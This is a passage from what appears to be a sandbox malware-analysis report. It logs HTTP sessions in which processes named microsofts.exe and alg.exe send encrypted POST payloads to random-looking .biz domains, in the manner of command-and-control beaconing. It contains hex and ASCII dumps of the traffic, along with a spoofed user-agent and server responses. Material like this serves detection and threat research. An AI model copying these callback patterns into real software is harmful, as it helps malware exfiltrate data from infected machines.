                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.499141932 CET828OUTData Raw: 1e f8 f8 42 b0 f3 34 41 30 03 00 00 6b 06 03 94 37 07 e5 fe ba fa ee 4b cc 2b b4 59 92 f4 93 2c 55 19 61 94 8d f1 20 ae 37 d3 75 4a 15 34 bc 19 fd d8 6d cc 89 06 a0 a7 d6 2d ac be 85 b9 64 5e 61 fd c9 aa 07 cd 61 b2 86 af 2f ea 57 ec e1 ef 68 68
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: B4A0k7K+Y,Ua 7uJ4m-d^aa/WhhBF-tsO>.=g6[uGf*-)@o$*pA:Q5cG_b%qk{85[jE% {{Ckx@}||+mevU\BW{%d$Y"2T5B
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.137124062 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              68192.168.2.559719208.100.26.245801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.550123930 CET354OUTPOST /qgkrosoxeed HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.550165892 CET828OUTData Raw: da 33 9c 6f 81 9e 7b ba 30 03 00 00 c6 ed 31 08 39 18 d8 7e 30 a4 e3 a1 84 57 78 f5 2a 9d 80 ca e7 67 de d3 a0 44 e1 8c bb ea 7a a1 80 8b 0c 0e 7a d9 7d 30 ff 8c 08 85 8c 8d 24 31 5d 2c ab 0e c0 30 09 23 b1 19 31 ca 6c 3a 27 aa fa cc fd 90 61 da
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 3o{019~0Wx*gDzz}0$1],0#1l:'a;o=$4B{(+fYagmm} 0AV\8Py1O3|!r7lUG[fq[4\8~IW!@=xIAahnf{zW
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:52.178833008 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              69192.168.2.55972113.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.765412092 CET359OUTPOST /gkytxybgvmhelx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.765472889 CET778OUTData Raw: eb 85 68 da 9f b4 3a 8a fe 02 00 00 9a dc 0e 27 8d 35 86 7a 8f b8 e2 ce 3d ea 62 6d a8 d6 b2 73 57 03 e3 79 59 e3 a4 5a 7d c3 a8 65 7c ae 98 eb 98 d5 47 af 64 96 f2 bf 74 c1 bf 48 ec 6e d7 c7 8d a7 73 21 f1 de a2 1c d0 ad e6 0e 79 cf 66 76 21 c4
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: h:'5z=bmsWyYZ}e|GdtHns!yfv!|1n\eq'Sou0W6/x1_p)~?KE_?G[-jSFXg*fp?lN,52P/\Kw4qIdh6`"Gv`mmX
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.183126926 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d27e0a0d76f55987c36d3accf2e38c3e|173.254.250.76|1730822632|1730822632|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              70192.168.2.55972434.211.97.45801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:52.260205984 CET357OUTPOST /yiteaphcawxhusdi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:52.260205984 CET828OUTData Raw: a0 48 09 8f d0 02 3a 17 30 03 00 00 44 dc 7e f3 c6 6f a2 51 e5 da bf 51 56 e6 f0 85 39 2d 81 93 0e 36 c4 1d f1 a6 b7 19 ba 27 78 00 85 64 76 db 63 a9 e3 21 a8 d0 d1 df d9 d9 73 c4 b5 ef 00 34 ec 8b ce 45 34 16 a0 c6 2f 69 32 01 7a f9 8c 8b 69 c3
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: H:0D~oQQV9-6'xdvc!s4E4/i2ziC2xYPara=zve$*MRwDX +r@3Tb<d"8jP5-(!Yi2T1us]^0x$$Ki{`~N.Hc*r}$H]
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.097253084 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=54327b8fe647579beadac5add3b7cfdd|173.254.250.76|1730822632|1730822632|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              71192.168.2.55972954.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.153350115 CET357OUTPOST /nfkiqboumamba HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.153378963 CET828OUTData Raw: 10 7b 14 f3 c7 a4 ed a5 30 03 00 00 f6 91 ec c5 1e e4 af fa d4 78 d8 54 6f 67 20 59 49 3d d1 52 9d 14 c7 3e 3c 2b f0 d4 42 ef fe fa 4c 65 49 df db ca 82 09 60 fd c8 b8 e3 9e f8 2d e4 7e 9c 87 d2 15 4b 54 29 a4 55 de 16 dc 4f ef 44 d8 6d 68 05 fd
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {0xTog YI=R><+BLeI`-~KT)UODmhcUU53^hY~=(jq9CO51G*"agZ?POf:&_3Z;$8sJD~+mMIWcS2/"EL9X%5h{4(WY~0xg4#
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.013762951 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5f59da6435ead878fc8a406359f18e14|173.254.250.76|1730822633|1730822633|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              72192.168.2.55973234.211.97.45801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.426381111 CET349OUTPOST /cgfpu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.426398039 CET778OUTData Raw: 8a 74 24 3d 1f e3 8d 20 fe 02 00 00 52 20 82 d7 3b 10 25 50 f5 1b b5 a2 99 54 39 f3 88 f0 2d 3f f7 ef 9c 0f bc 47 56 11 42 fe c6 07 5b 45 79 c4 9b 95 75 67 90 b4 97 0f 7c e0 30 01 af d7 46 a9 94 dd be 9c 33 77 f5 ab de 84 19 43 37 e0 a0 ee c5 4f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t$= R ;%PT9-?GVB[Eyug|0F3wC7O+6y_;1< L4(y2&b@0Kfvj&Kc+Ae-dZE(I(x7qOH(@52a_twkh+{kCdhhVcdd0|UW*B
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.263894081 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6f4c841b9c9407f453a53c5be0e2e896|173.254.250.76|1730822634|1730822634|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              73192.168.2.55973718.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.178164959 CET355OUTPOST /kfabynhosjjh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.178214073 CET828OUTData Raw: c1 ea 0f b4 b6 4a 75 34 30 03 00 00 ee 9a 04 92 6c c1 0b 3f d7 1a 01 79 b0 2c c5 49 39 13 fc cb c7 a8 9c 3b fb 2e 2a a9 3d a8 8f 22 25 17 5e 1f 1b 0f de 51 b1 5f 68 74 36 f6 b9 03 ae f3 a0 c8 df 25 f4 66 25 c0 97 c1 ee cc b1 62 cb ce 8e 17 9c 8e
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Ju40l?y,I9;.*="%^Q_ht6%f%b=pS U1=6RZ^BCK^8c>t$waMhhskQ]_'E7obXrJ^n|J5.ZzbJ(n@KW#B.a[;fK>qy~
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.591325998 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b1d397a78e5ee993aa7837bbc6d540ea|173.254.250.76|1730822635|1730822635|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              74192.168.2.55974247.129.31.212801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.595113039 CET347OUTPOST /wcjgm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.595180035 CET778OUTData Raw: 95 a1 68 03 4f 41 57 01 fe 02 00 00 ba cd 13 d7 2c e9 c0 a5 83 06 fe 75 7e 60 26 09 4a 05 00 5b d5 ec a7 ed 99 6e 52 34 1f ac 1a ef 44 37 5d 97 95 98 64 8f 4f aa 3c c1 4c 6f 51 b9 17 ee 35 bd aa 2e 7c df 43 1c 1f f8 17 cd eb 5c 6a fd 8a 5a 22 e8
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: hOAW,u~`&J[nR4D7]dO<LoQ5.|C\jZ"hPBS6:I.uaeg50aRv[IPw9 [FXS!2d*qvng-rRYSFMuqYxH< EE
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.039856911 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a53f54a9e1486462d609c74ebe29a9f0|173.254.250.76|1730822635|1730822635|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              75192.168.2.55974318.208.156.248801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.651700974 CET353OUTPOST /uayanvrydqdv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.651720047 CET828OUTData Raw: 7b ec 30 cd 2c 1b 16 fe 30 03 00 00 ba be 67 42 96 50 8d 3e 4f 1c e9 26 7f ed 89 c4 70 7c 73 7b 34 6f 7d 31 d8 32 6e e8 77 9b 57 88 54 82 2e eb 39 ff 42 fc 4d f0 ab 1a 1c 01 60 86 2a 10 8d 4a 28 88 87 12 9d 76 20 0e 57 40 18 43 3c 30 fc 70 a2 66
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {0,0gBP>O&p|s{4o}12nwWT.9BM`*J(v W@C<0pf;<hUU+?CP!^y7a<Lec]Vxh4f(7O]ERtEd.EY"6YDa)lJO/(#*V&OQ>5'/VVJT&
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.321914911 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7cb36427558f8e0df1517c553297aecc|173.254.250.76|1730822636|1730822636|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              76192.168.2.55974413.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
